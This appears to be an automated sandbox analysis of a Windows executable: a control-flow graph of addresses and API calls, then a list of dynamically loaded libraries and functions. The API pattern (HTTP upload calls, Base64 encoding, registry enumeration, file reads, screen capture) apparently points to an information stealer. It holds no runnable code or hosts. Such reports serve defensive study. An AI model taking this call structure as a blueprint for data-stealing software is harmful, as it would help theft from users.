14009 41e4c0 13999->14009 14001->13715 14003 411289 14002->14003 14004 411278 memset 14002->14004 14003->13923 14004->14003 14005->13948 14007 4112ba GetProcessHeap HeapFree 14006->14007 14008 4112cc 14006->14008 14007->14008 14008->13948 14010 41e4f0 14009->14010 14011 41e4c8 14009->14011 14010->13997 14012 41e4e8 14011->14012 14014 41dd60 14011->14014 14012->13997 14015 41dd75 14014->14015 14067 41dd82 14014->14067 14016 41dd91 lstrcpyA 14015->14016 14015->14067 14017 41ddd0 14016->14017 14016->14067 14018 41de32 strlen 14017->14018 14019 41de09 14017->14019 14021 41de17 14018->14021 14071 41d0c0 lstrlenA 14019->14071 14022 41def3 14021->14022 14023 41de6c 14021->14023 14024 41d590 14 API calls 14022->14024 14025 41de75 14023->14025 14026 41df04 14023->14026 14034 41df02 14024->14034 14028 41df1f 14025->14028 14029 41de7e 14025->14029 14091 41d710 14026->14091 14028->14067 14095 41d850 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14028->14095 14030 41dea8 CreateFileA 14029->14030 14029->14067 14032 41ded5 14030->14032 14030->14067 14082 41d590 14032->14082 14033 41df42 lstrcpyA lstrcpyA lstrlenA 14036 41df8c lstrcpyA 14033->14036 14037 41df7c lstrcatA 14033->14037 14034->14033 14034->14067 14097 41e500 14036->14097 14037->14036 14039 41dee5 CloseHandle 14039->14067 14067->14012 14067->14067 14073 41d0d5 14071->14073 14072 41d0f7 StrCmpCA 14074 41d17c 14072->14074 14075 41d109 StrCmpCA 14072->14075 14073->14072 14073->14074 14074->14021 14075->14074 14076 41d119 StrCmpCA 14075->14076 14076->14074 14077 41d129 StrCmpCA 14076->14077 14077->14074 14078 41d139 StrCmpCA 14077->14078 14078->14074 14079 41d149 StrCmpCA 14078->14079 14079->14074 14080 41d159 StrCmpCA 14079->14080 14080->14074 14081 41d169 StrCmpCA 14080->14081 14081->14074 14083 41d5d8 SetFilePointer 14082->14083 14084 41d5cc 14082->14084 14085 41d622 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14083->14085 14086 41d5ee 14083->14086 14084->14034 14084->14039 14088 41d6dd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14085->14088 14232 41d190 GetFileInformationByHandle 14086->14232 14090 41d60a SetFilePointer 14090->14084 14092 41d769 14091->14092 14093 41d813 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14091->14093 14092->14093 14094 41d771 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14092->14094 14093->14034 14094->14093 14096 41d919 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14095->14096 14096->14034 14098 41d3f0 5 API calls 14097->14098 14099 41e521 14098->14099 14100 41d3f0 5 API calls 14099->14100 14101 41e530 14100->14101 14102 41d3f0 5 API calls 14101->14102 14103 41e543 14102->14103 14104 41d3f0 5 API calls 14103->14104 14105 41e552 14104->14105 14106 41d3f0 5 API calls 14105->14106 14107 41e568 14106->14107 14108 41d3f0 5 API calls 14107->14108 14109 41e57a 14108->14109 14110 41d3f0 5 API calls 14109->14110 14111 41e590 14110->14111 14112 41d3f0 5 API calls 14111->14112 14113 41e5a2 14112->14113 14114 41d3f0 5 API calls 14113->14114 14115 41e5b8 14114->14115 14116 41d3f0 5 API calls 14115->14116 14117 41e5ca 14116->14117 14118 41d3f0 5 API calls 14117->14118 14119 41e5e0 14118->14119 14120 41d3f0 5 API calls 14119->14120 14121 41e5f2 14120->14121 14122 41d3f0 5 API calls 14121->14122 14123 41e608 14122->14123 14124 41d3f0 5 API calls 14123->14124 14125 41e61a 14124->14125 14126 41d3f0 5 API calls 14125->14126 14127 41e630 14126->14127 14128 41d3f0 5 API calls 14127->14128 14129 41e642 14128->14129 14130 41d3f0 5 API calls 14129->14130 14131 41e658 14130->14131 14132 41d3f0 5 API calls 14131->14132 14133 41e66a 14132->14133 14134 41d3f0 5 API calls 14133->14134 14135 41e680 14134->14135 14136 41d3f0 5 API calls 14135->14136 14137 41e692 14136->14137 14138 41d3f0 5 API calls 14137->14138 14139 41e6a8 14138->14139 14140 41d3f0 5 API calls 14139->14140 14141 41e6ba 14140->14141 14142 41d3f0 5 API calls 14141->14142 14143 41e6d0 14142->14143 14144 41d3f0 5 API calls 14143->14144 14145 41e6e2 14144->14145 14146 41d3f0 5 API calls 14145->14146 14233 41d29a 14232->14233 14234 41d1af GetFileSize 14232->14234 14233->14084 14233->14090 14235 41d1f6 SetFilePointer ReadFile SetFilePointer ReadFile 14234->14235 14239 41d281 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14234->14239 14236 41d243 14235->14236 14235->14239 14237 41d24e SetFilePointer ReadFile 14236->14237 14236->14239 14237->14239 14238 41d330 FileTimeToSystemTime 14238->14233 14239->14233 14239->14238 14282 410530 14271->14282 14273 416ebf lstrlenA 14274 416f9e 14273->14274 14278 416eca 14273->14278 14275 410200 lstrcpyA 14275->14278 14277 410290 lstrcpyA 14277->14278 14278->14275 14278->14277 14279 416f71 StrCmpCA 14278->14279 14283 403090 14278->14283 14279->14278 14280 416f81 14279->14280 14281 411270 memset 14280->14281 14281->14274 14282->14273 14284 4101c0 lstrcpyA 14283->14284 14285 4030b2 14284->14285 14286 410200 lstrcpyA 14285->14286 14287 4030c2 14286->14287 14288 402790 5 API calls 14287->14288 14289 4030d2 14288->14289 14488 4116b0 14289->14488 14291 403103 14292 403113 lstrlenA 14291->14292 14293 40311f 14292->14293 14294 4116b0 7 API calls 14293->14294 14295 40312e 14294->14295 14296 4101c0 lstrcpyA 14295->14296 14297 40313d 14296->14297 14298 4101c0 lstrcpyA 14297->14298 14299 40314a 14298->14299 14300 4101c0 lstrcpyA 14299->14300 14301 403157 14300->14301 14302 4101c0 lstrcpyA 14301->14302 14303 403164 StrCmpCA 14302->14303 14304 4031ab 14303->14304 14305 40317e 14303->14305 14306 4113b0 4 API calls 14304->14306 14307 40318c InternetOpenA 14305->14307 14308 4031b9 14306->14308 14307->14304 14318 40386c 14307->14318 14309 4102e0 2 API calls 14308->14309 14310 4031c8 14309->14310 14311 410290 lstrcpyA 14310->14311 14312 4031d0 14311->14312 14313 410340 3 API calls 14312->14313 14314 4031f2 14313->14314 14315 4102e0 2 API calls 14314->14315 14316 4031fe 14315->14316 14317 410340 3 API calls 14316->14317 14319 40320b 14317->14319 14320 410200 lstrcpyA 14318->14320 14321 410290 lstrcpyA 14319->14321 14330 4038ae 14320->14330 14322 403214 14321->14322 14323 410340 3 API calls 14322->14323 14324 403239 14323->14324 14325 4102e0 2 API calls 14324->14325 14326 403245 14325->14326 14327 410290 lstrcpyA 14326->14327 14328 40324d 14327->14328 14329 40325e InternetConnectA 14328->14329 14329->14318 14331 40329e HttpOpenRequestA 14329->14331 14330->14278 14332 403865 InternetCloseHandle 14331->14332 14333 4032db 14331->14333 14332->14318 14334 403300 14333->14334 14335 4032e8 InternetSetOptionA 14333->14335 14336 410340 3 API calls 14334->14336 14335->14334 14337 403310 14336->14337 14338 410290 lstrcpyA 14337->14338 14339 403318 14338->14339 14340 4102e0 2 API calls 14339->14340 14341 40332b 14340->14341 14342 410290 lstrcpyA 14341->14342 14343 403333 14342->14343 14344 410340 3 API calls 14343->14344 14345 403347 14344->14345 14346 410290 lstrcpyA 14345->14346 14489 4116c2 14488->14489 14490 411727 14488->14490 14489->14490 14491 4116d6 CryptBinaryToStringA 14489->14491 14490->14291 14491->14490 14492 4116f3 GetProcessHeap RtlAllocateHeap 14491->14492 14492->14490 14493 41170e CryptBinaryToStringA 14492->14493 14493->14490 14494 411733 GetLastError GetProcessHeap HeapFree 14493->14494 14494->14490 14499 4101c0 lstrcpyA 14498->14499 14500 40b108 14499->14500 14501 411550 2 API calls 14500->14501 14502 40b121 14501->14502 14503 4102e0 2 API calls 14502->14503 14504 40b12d 14503->14504 14505 410290 lstrcpyA 14504->14505 14506 40b135 14505->14506 14507 4102e0 2 API calls 14506->14507 14508 40b14f 14507->14508 14509 410290 lstrcpyA 14508->14509 14510 40b157 14509->14510 14511 4101c0 lstrcpyA 14510->14511 14512 40b16a 14511->14512 14513 4102e0 2 API calls 14512->14513 14514 40b173 14513->14514 14515 410290 lstrcpyA 14514->14515 14516 40b17b 14515->14516 14517 410340 3 API calls 14516->14517 14518 40b192 14517->14518 14519 410340 3 API calls 14518->14519 14520 40b19f 14519->14520 14521 410290 lstrcpyA 14520->14521 14522 40b1a7 14521->14522 14523 410200 lstrcpyA 14522->14523 14524 40b1c2 14523->14524 14905 411520 14524->14905 14526 40b1c7 14527 40b2a0 14526->14527 14528 40b1e1 14526->14528 14552 40b298 14526->14552 14529 410200 lstrcpyA 14527->14529 14531 410200 lstrcpyA 14528->14531 14528->14552 14530 40b2b7 14529->14530 14532 410200 lstrcpyA 14530->14532 14533 40b226 14531->14533 14534 40b2c6 14532->14534 14535 410200 lstrcpyA 14533->14535 14536 410200 lstrcpyA 14534->14536 14537 40b232 14535->14537 14538 40b2d5 14536->14538 14539 410200 lstrcpyA 14537->14539 14540 410200 lstrcpyA 14538->14540 14541 40b23e 14539->14541 14542 40b2ee 14540->14542 14543 410200 lstrcpyA 14541->14543 14546 410200 lstrcpyA 14542->14546 14544 40b254 14543->14544 14545 410200 lstrcpyA 14544->14545 14547 40b278 14545->14547 14548 40b31b 14546->14548 14549 410200 lstrcpyA 14547->14549 14914 4078f0 14548->14914 14551 40b283 14549->14551 14909 40af60 14551->14909 14575 4101c0 lstrcpyA 14574->14575 14576 40b4fb 14575->14576 14577 4101c0 lstrcpyA 14576->14577 14578 40b508 14577->14578 14579 40b51d StrCmpCA 14578->14579 14580 40b531 14579->14580 14581 40b6b3 14579->14581 14583 411550 2 API calls 14580->14583 14582 411550 2 API calls 14581->14582 14584 40b6c0 14582->14584 14585 40b53c 14583->14585 14587 4102e0 2 API calls 14584->14587 14586 4102e0 2 API calls 14585->14586 14588 40b54a 14586->14588 14589 40b6cc 14587->14589 14590 410290 lstrcpyA 14588->14590 14591 410290 lstrcpyA 14589->14591 14592 40b552 14590->14592 14593 40b6d4 14591->14593 14595 4102e0 2 API calls 14592->14595 14594 4102e0 2 API calls 14593->14594 14596 40b6ee 14594->14596 14597 40b56c 14595->14597 14598 4102e0 2 API calls 14596->14598 14599 4102e0 2 API calls 14597->14599 14600 40b6fa 14598->14600 14601 40b578 14599->14601 14602 410290 lstrcpyA 14600->14602 14603 410290 lstrcpyA 14601->14603 14605 40b702 14602->14605 14604 40b580 14603->14604 14606 4101c0 lstrcpyA 14604->14606 14607 411550 2 API calls 14605->14607 14608 40b59a 14606->14608 14609 40b718 14607->14609 14610 4102e0 2 API calls 14608->14610 14611 4102e0 2 API calls 14609->14611 14612 40b5a3 14610->14612 14613 40b724 14611->14613 14614 410290 lstrcpyA 14612->14614 14615 410290 lstrcpyA 14613->14615 14616 40b5ab 14614->14616 14617 40b72d 14615->14617 14618 410340 3 API calls 14616->14618 14620 4101c0 lstrcpyA 14617->14620 14619 40b5c2 14618->14619 14621 410340 3 API calls 14619->14621 14622 40b747 14620->14622 14623 40b5cf 14621->14623 14624 4102e0 2 API calls 14622->14624 14625 410290 lstrcpyA 14623->14625 14626 40b750 14624->14626 14629 40b5d7 14625->14629 14627 410290 lstrcpyA 14626->14627 14628 40b758 14627->14628 14631 410340 3 API calls 14628->14631 14630 410200 lstrcpyA 14629->14630 14632 40b5f2 14630->14632 14633 40b76f 14631->14633 14634 411520 GetFileAttributesA 14632->14634 14635 410340 3 API calls 14633->14635 14636 40b5f7 14634->14636 14637 40b77c 14635->14637 14640 40b611 14636->14640 14641 40b876 14636->14641 14700 40b86e 14636->14700 14638 410290 lstrcpyA 14637->14638 14639 40b784 14638->14639 14650 410200 lstrcpyA 14639->14650 14643 410200 lstrcpyA 14640->14643 14640->14700 14642 410200 lstrcpyA 14641->14642 14644 40b88d 14642->14644 14645 40b657 14643->14645 14646 410200 lstrcpyA 14644->14646 14647 410200 lstrcpyA 14645->14647 14648 40b89c 14646->14648 14651 40b663 14647->14651 14649 410200 lstrcpyA 14648->14649 14652 40b8ab 14649->14652 14653 40b79f 14650->14653 14654 410200 lstrcpyA 14651->14654 14656 410200 lstrcpyA 14652->14656 14657 411520 GetFileAttributesA 14653->14657 14655 40b66f 14654->14655 14658 410200 lstrcpyA 14655->14658 14659 40b8c4 14656->14659 14660 40b7a4 14657->14660 14661 40b685 14658->14661 14666 410200 lstrcpyA 14659->14666 14663 40b7c0 14660->14663 14664 40b9db 14660->14664 14660->14700 14662 410200 lstrcpyA 14661->14662 14665 40b6a9 14662->14665 14667 410200 lstrcpyA 14663->14667 14668 410200 lstrcpyA 14664->14668 14673 410200 lstrcpyA 14665->14673 14669 40b8f1 14666->14669 14670 40b7fc 14667->14670 14671 40b9f0 14668->14671 14674 4078f0 144 API calls 14669->14674 14675 410200 lstrcpyA 14670->14675 14672 410200 lstrcpyA 14671->14672 14676 40b9ff 14672->14676 14677 40b859 14673->14677 14678 40b90f 14674->14678 14679 40b808 14675->14679 14681 410200 lstrcpyA 14676->14681 14678->14700 14680 410200 lstrcpyA 14679->14680 14683 40b814 14680->14683 14732 4101c0 lstrcpyA 14731->14732 14733 40ce08 14732->14733 14734 4101c0 lstrcpyA 14733->14734 14735 40ce15 14734->14735 14736 411550 2 API calls 14735->14736 14737 40ce20 14736->14737 14738 4102e0 2 API calls 14737->14738 14739 40ce2c 14738->14739 14740 410290 lstrcpyA 14739->14740 14741 40ce34 14740->14741 14742 4102e0 2 API calls 14741->14742 14743 40ce4e 14742->14743 14744 410290 lstrcpyA 14743->14744 14745 40ce56 14744->14745 14746 4102e0 2 API calls 14745->14746 14747 40ce69 14746->14747 14748 410290 lstrcpyA 14747->14748 14749 40ce76 14748->14749 14750 410340 3 API calls 14749->14750 14751 40ce8d 14750->14751 14752 410340 3 API calls 14751->14752 14753 40ce9a 14752->14753 14754 410290 lstrcpyA 14753->14754 14755 40cea3 14754->14755 14756 410200 lstrcpyA 14755->14756 14757 40cec1 14756->14757 14758 411520 GetFileAttributesA 14757->14758 14759 40cec6 14758->14759 14760 40cfa4 14759->14760 14761 40cedf 14759->14761 14790 40cf9f 14759->14790 14763 410200 lstrcpyA 14760->14763 14762 410200 lstrcpyA 14761->14762 14764 40cf1d 14762->14764 14765 40cfbc 14763->14765 14766 410200 lstrcpyA 14764->14766 14767 410200 lstrcpyA 14765->14767 14768 40cf29 14766->14768 14769 40cfc8 14767->14769 14770 4101c0 lstrcpyA 14768->14770 14771 4101c0 lstrcpyA 14769->14771 14772 40cf36 14770->14772 14773 40cfd5 14771->14773 14774 410200 lstrcpyA 14772->14774 14775 410200 lstrcpyA 14773->14775 14776 40cf41 14774->14776 14777 40cfe0 14775->14777 14778 410200 lstrcpyA 14776->14778 14779 410200 lstrcpyA 14777->14779 14780 40cf4d 14778->14780 14781 40cfec 14779->14781 14783 410200 lstrcpyA 14780->14783 14782 410200 lstrcpyA 14781->14782 14785 40cff8 14782->14785 14784 40cf59 14783->14784 14786 410200 lstrcpyA 14784->14786 14787 410200 lstrcpyA 14785->14787 14788 40cf6f 14786->14788 14789 40d00e 14787->14789 15840 40c790 14788->15840 15938 409460 14789->15938 14794 40da5f RegGetValueA 14793->14794 14802 40daa2 14793->14802 14795 40da89 14794->14795 14796 40da8e 14794->14796 14799 40da9b RegCloseKey 14795->14799 14795->14802 14796->14795 14797 40dadd RegOpenKeyExA 14796->14797 14798 40dacf RegCloseKey 14796->14798 14800 40daf6 RegEnumKeyExA 14797->14800 14797->14802 14798->14797 14799->14802 14800->14795 14801 40db28 14800->14801 14803 4101c0 lstrcpyA 14801->14803 14802->13732 14813 40db37 14803->14813 14804 40dc2a RegGetValueA 14804->14813 14806 4102e0 2 API calls 14806->14813 14807 410340 lstrlenA lstrcpyA lstrcatA 14807->14813 14808 410290 lstrcpyA 14808->14813 14809 40dd12 RegGetValueA 14810 410340 3 API calls 14809->14810 14810->14813 14811 40dd4e StrCmpCA 14811->14813 14813->14804 14813->14806 14813->14807 14813->14808 14813->14809 14813->14811 14814 40db6d RegEnumKeyExA 14813->14814 14818 40db42 ??3@YAXPAX 14813->14818 14819 40dddf _invalid_parameter_noinfo_noreturn 14813->14819 16054 411ea0 wsprintfA 14813->16054 16057 40d250 14813->16057 14814->14813 14815 40dde4 14814->14815 14816 40ddfd lstrlenA 14815->14816 14817 40de0a 14816->14817 14820 4101c0 lstrcpyA 14817->14820 14818->14813 14819->14815 14821 40de19 14820->14821 14822 406f80 lstrcpyA 14821->14822 14823 40de25 14822->14823 14824 413e50 130 API calls 14823->14824 14825 40de38 14824->14825 14826 40de6c 14825->14826 14827 40de5e RegCloseKey 14825->14827 14826->14802 14827->14826 14829 4101c0 lstrcpyA 14828->14829 14830 40de98 14829->14830 14831 411550 2 API calls 14830->14831 14832 40dea9 14831->14832 14833 4102e0 2 API calls 14832->14833 14834 40deb5 14833->14834 14835 410290 lstrcpyA 14834->14835 14836 40debd 14835->14836 14837 410340 3 API calls 14836->14837 14838 40ded8 14837->14838 14839 410290 lstrcpyA 14838->14839 14840 40dee0 14839->14840 14841 410200 lstrcpyA 14840->14841 14842 40def6 14841->14842 14843 4076b0 6 API calls 14842->14843 14844 40df07 14843->14844 14845 4115b0 LocalAlloc 14844->14845 14853 40e064 14844->14853 14846 40df1c 14845->14846 14847 40df24 strtok_s 14846->14847 14846->14853 14848 4101c0 lstrcpyA 14847->14848 14849 40df44 14848->14849 14850 4101c0 lstrcpyA 14849->14850 14851 40df51 14850->14851 14852 4101c0 lstrcpyA 14851->14852 14854 40df5e 14852->14854 14853->13761 14855 4101c0 lstrcpyA 14854->14855 14856 40df6b GetProcessHeap HeapAlloc 14855->14856 14857 40e0b9 StrStrA 14856->14857 14858 40df8c lstrlenA 14856->14858 14934 410530 14905->14934 14907 411534 GetFileAttributesA 14908 411545 14907->14908 14908->14526 14910 40af76 14909->14910 14911 40b0b0 14909->14911 14910->14911 14915 4101c0 lstrcpyA 14914->14915 14916 40790e 14915->14916 14977 4076b0 14916->14977 14934->14907 14997 410530 14977->14997 15841 4101c0 lstrcpyA 15840->15841 15842 40c7b2 15841->15842 15939 4101c0 lstrcpyA 15938->15939 15940 409481 15939->15940 15941 4102e0 2 API calls 15940->15941 16055 4101c0 lstrcpyA 16054->16055 16056 411ec6 16055->16056 16056->14813 16171 40d080 lstrlenA 16057->16171 16059 40d2ac GetProcessHeap HeapAlloc 16060 40d2d1 strcpy_s 16059->16060 16061 40d3dc 16059->16061 16062 40d2e2 GetProcessHeap HeapFree 16060->16062 16063 40d2f9 16060->16063 16064 40d3e4 GetProcessHeap HeapFree 16061->16064 16065 40d758 16061->16065 16062->16063 16067 40d3f9 16063->16067 16068 40d080 370 API calls 16063->16068 16064->16065 16066 402400 11 API calls 16065->16066 16092 40d77f 16065->16092 16066->16092 16070 40d080 370 API calls 16067->16070 16072 40d318 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16068->16072 16069 40d819 16069->14813 16074 40d40d GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16070->16074 16071 40d7c3 ??3@YAXPAX 16077 40d7cc 16071->16077 16072->16061 16076 40d349 strcpy_s 16072->16076 16073 40d810 ??3@YAXPAX 16073->16069 16078 40d440 strcpy_s 16074->16078 16079 40d73b 16074->16079 16075 40d9a7 _invalid_parameter_noinfo_noreturn 16080 40d9ac 16075->16080 16081 40d371 16076->16081 16082 40d35a GetProcessHeap HeapFree 16076->16082 16077->16069 16077->16073 16077->16075 16094 40d80e 16077->16094 16085 40d467 lstrlenA GetProcessHeap HeapAlloc 16078->16085 16086 40d457 GetProcessHeap HeapFree 16078->16086 16079->16065 16083 40d73f GetProcessHeap 16079->16083 16087 402510 4 API calls 16080->16087 16084 40d080 370 API calls 16081->16084 16082->16081 16088 40d74f HeapFree 16083->16088 16089 40d381 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16084->16089 16085->16065 16091 40d499 16085->16091 16086->16085 16090 40d9b5 memset memset memset memset RegOpenKeyExA 16087->16090 16088->16065 16089->16061 16093 40d3b2 strcpy_s 16089->16093 16099 40da5f RegGetValueA 16090->16099 16112 40daa2 16090->16112 16096 40d4c0 16091->16096 16097 40d4b5 strlen 16091->16097 16092->16071 16092->16075 16092->16077 16093->16067 16098 40d3c3 GetProcessHeap HeapFree 16093->16098 16094->16073 16102 402400 11 API calls 16096->16102 16097->16096 16098->16067 16100 40da89 16099->16100 16101 40da8e 16099->16101 16107 40da9b RegCloseKey 16100->16107 16100->16112 16101->16100 16105 40dadd RegOpenKeyExA 16101->16105 16106 40dacf RegCloseKey 16101->16106 16103 40d4cd lstrlenA 16102->16103 16104 40ed20 11 API calls 16103->16104 16108 40d4fe strcpy_s 16104->16108 16109 40daf6 RegEnumKeyExA 16105->16109 16105->16112 16106->16105 16107->16112 16120 40d51d 16108->16120 16127 40d561 16108->16127 16109->16100 16111 40db28 16109->16111 16113 4101c0 lstrcpyA 16111->16113 16112->14813 16159 40db37 16113->16159 16114 40d558 ??3@YAXPAX 16114->16127 16115 40d5c3 GetProcessHeap HeapFree lstrlenA GetProcessHeap HeapAlloc 16116 40d748 GetProcessHeap 16115->16116 16117 40d5fd strcpy_s GetProcessHeap HeapFree 16115->16117 16116->16088 16119 40d628 16117->16119 16135 40d670 16117->16135 16118 40d5ba ??3@YAXPAX 16118->16115 16122 40d92f GetProcessHeap HeapFree 16119->16122 16125 40d825 16119->16125 16126 40d65b strlen 16119->16126 16120->16075 16120->16114 16121 40d080 370 API calls 16123 40d68f GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16121->16123 16122->16092 16124 40d953 16122->16124 16123->16079 16128 40d6be strcpy_s 16123->16128 16124->16092 16129 40d961 memcpy 16124->16129 16131 402400 11 API calls 16125->16131 16126->16125 16127->16075 16127->16115 16127->16118 16130 40d6cf GetProcessHeap HeapFree 16128->16130 16128->16135 16129->16092 16130->16135 16132 40d834 16131->16132 16133 406940 3 API calls 16132->16133 16142 40d83e 16133->16142 16134 402520 6 API calls 16134->16135 16135->16080 16135->16119 16135->16121 16135->16134 16136 40d88b 16137 40d8a2 16136->16137 16138 40d897 strlen 16136->16138 16140 406b00 276 API calls 16137->16140 16138->16137 16139 40d882 ??3@YAXPAX 16139->16136 16141 40d8af 16140->16141 16143 40ed20 11 API calls 16141->16143 16142->16075 16142->16136 16142->16139 16144 40d8da 16143->16144 16147 40dc2a RegGetValueA 16147->16159 16148 411ea0 2 API calls 16148->16159 16150 4102e0 2 API calls 16150->16159 16151 410290 lstrcpyA 16151->16159 16152 40dd12 RegGetValueA 16153 410340 3 API calls 16152->16153 16153->16159 16154 40dd4e StrCmpCA 16154->16159 16155 410340 lstrlenA lstrcpyA lstrcatA 16155->16159 16156 40d250 370 API calls 16156->16159 16157 40db6d RegEnumKeyExA 16158 40dde4 16157->16158 16157->16159 16160 40ddfd lstrlenA 16158->16160 16159->16147 16159->16148 16159->16150 16159->16151 16159->16152 16159->16154 16159->16155 16159->16156 16159->16157 16162 40db42 ??3@YAXPAX 16159->16162 16163 40dddf _invalid_parameter_noinfo_noreturn 16159->16163 16161 40de0a 16160->16161 16164 4101c0 lstrcpyA 16161->16164 16162->16159 16163->16158 16165 40de19 16164->16165 16166 406f80 lstrcpyA 16165->16166 16167 40de25 16166->16167 16168 413e50 130 API calls 16167->16168 16169 40de38 16168->16169 16169->16112 16170 40de5e RegCloseKey 16169->16170 16170->16112 16172 40d227 16171->16172 16173 40d0ad strchr 16171->16173 16172->16059 16173->16172 16174 40d0c6 strchr 16173->16174 16174->16172 16175 40d0de lstrlenA GetProcessHeap HeapAlloc 16174->16175 16175->16172 16176 40d115 16175->16176 16177 40d13a 16176->16177 16178 40d12f strlen 16176->16178 16179 402400 11 API calls 16177->16179 16178->16177 16180 40d14c 16179->16180 16181 40ed20 11 API calls 16180->16181 16182 40d171 strcpy_s 16181->16182 16187 40d1d5 16182->16187 16189 40d199 16182->16189 16184 40d1cc ??3@YAXPAX 16184->16187 16185 40d21e ??3@YAXPAX 16185->16172 16186 40d244 _invalid_parameter_noinfo_noreturn 16188 40d250 16186->16188 16187->16172 16187->16185 16187->16186 16192 40d21c 16187->16192 16190 40d080 359 API calls 16188->16190 16189->16184 16189->16186 16191 40d2ac GetProcessHeap HeapAlloc 16190->16191 16193 40d2d1 strcpy_s 16191->16193 16194 40d3dc 16191->16194 16192->16185 16195 40d2e2 GetProcessHeap HeapFree 16193->16195 16196 40d2f9 16193->16196 16197 40d3e4 GetProcessHeap HeapFree 16194->16197 16198 40d758 16194->16198 16195->16196 16200 40d3f9 16196->16200 16201 40d080 359 API calls 16196->16201 16197->16198 16199 402400 11 API calls 16198->16199 16225 40d77f 16198->16225 16199->16225 16203 40d080 359 API calls 16200->16203 16205 40d318 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16201->16205 16202 40d819 16202->16059 16207 40d40d GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16203->16207 16204 40d7c3 ??3@YAXPAX 16210 40d7cc 16204->16210 16205->16194 16209 40d349 strcpy_s 16205->16209 16206 40d810 ??3@YAXPAX 16206->16202 16211 40d440 strcpy_s 16207->16211 16212 40d73b 16207->16212 16208 40d9a7 _invalid_parameter_noinfo_noreturn 16213 40d9ac 16208->16213 16214 40d371 16209->16214 16215 40d35a GetProcessHeap HeapFree 16209->16215 16210->16202 16210->16206 16210->16208 16227 40d80e 16210->16227 16218 40d467 lstrlenA GetProcessHeap HeapAlloc 16211->16218 16219 40d457 GetProcessHeap HeapFree 16211->16219 16212->16198 16216 40d73f GetProcessHeap 16212->16216 16220 402510 4 API calls 16213->16220 16217 40d080 359 API calls 16214->16217 16215->16214 16221 40d74f HeapFree 16216->16221 16222 40d381 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 16217->16222 16218->16198 16224 40d499 16218->16224 16219->16218 16223 40d9b5 memset memset memset memset RegOpenKeyExA 16220->16223 16221->16198 16222->16194 16226 40d3b2 strcpy_s 16222->16226 16232 40da5f RegGetValueA 16223->16232 16250 40daa2 16223->16250 16229 40d4c0 16224->16229 16230 40d4b5 strlen 16224->16230 16225->16204 16225->16208 16225->16210 16226->16200 16231 40d3c3 GetProcessHeap HeapFree 16226->16231 16227->16206 16235 402400 11 API calls 16229->16235 16230->16229 16231->16200 16233 40da89 16232->16233 16234 40da8e 16232->16234 16240 40da9b RegCloseKey 16233->16240 16233->16250 16234->16233 16238 40dadd RegOpenKeyExA 16234->16238 16239 40dacf RegCloseKey 16234->16239 16236 40d4cd lstrlenA 16235->16236 16237 40ed20 11 API calls 16236->16237 16241 40d4fe strcpy_s 16237->16241 16242 40daf6 RegEnumKeyExA 16238->16242 16238->16250 16239->16238 16240->16250 16253 40d51d 16241->16253 16260 40d561 16241->16260 16242->16233 16244 40db28 16242->16244 16245 4101c0 lstrcpyA 16244->16245 16299 40db37 16245->16299 16246 40d558 ??3@YAXPAX 16246->16260 16247 40d5c3 GetProcessHeap HeapFree lstrlenA GetProcessHeap HeapAlloc 16250->16059 16251 40d5ba ??3@YAXPAX 16251->16247 16253->16208 16253->16246 16260->16208 16260->16247 16260->16251 16267 410340 lstrlenA lstrcpyA lstrcatA 16267->16299 16280 410290 lstrcpyA 16280->16299 16282 40dc2a RegGetValueA 16282->16299 16283 411ea0 2 API calls 16283->16299 16285 4102e0 2 API calls 16285->16299 16286 40dd12 RegGetValueA 16288 40dd4e StrCmpCA 16288->16299 16289 40d250 359 API calls 16289->16299 16290 40db6d RegEnumKeyExA 16290->16299 16294 40db42 ??3@YAXPAX 16294->16299 16295 40dddf _invalid_parameter_noinfo_noreturn 16299->16267 16299->16280 16299->16282 16299->16283 16299->16285 16299->16286 16299->16288 16299->16289 16299->16290 16299->16294 16299->16295

                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                      Function 004188E0 Relevance: 334.8, APIs: 71, Strings: 120, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00418D47
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll), ref: 00418D57
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75FD0000,CreateCompatibleBitmap), ref: 00418DA1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(SelectObject), ref: 00418DB7
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(BitBlt), ref: 00418DCD
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(DeleteObject), ref: 00418DE3
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CreateCompatibleDC), ref: 00418DF9
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734B0000,GdipGetImageEncodersSize), ref: 00418E17
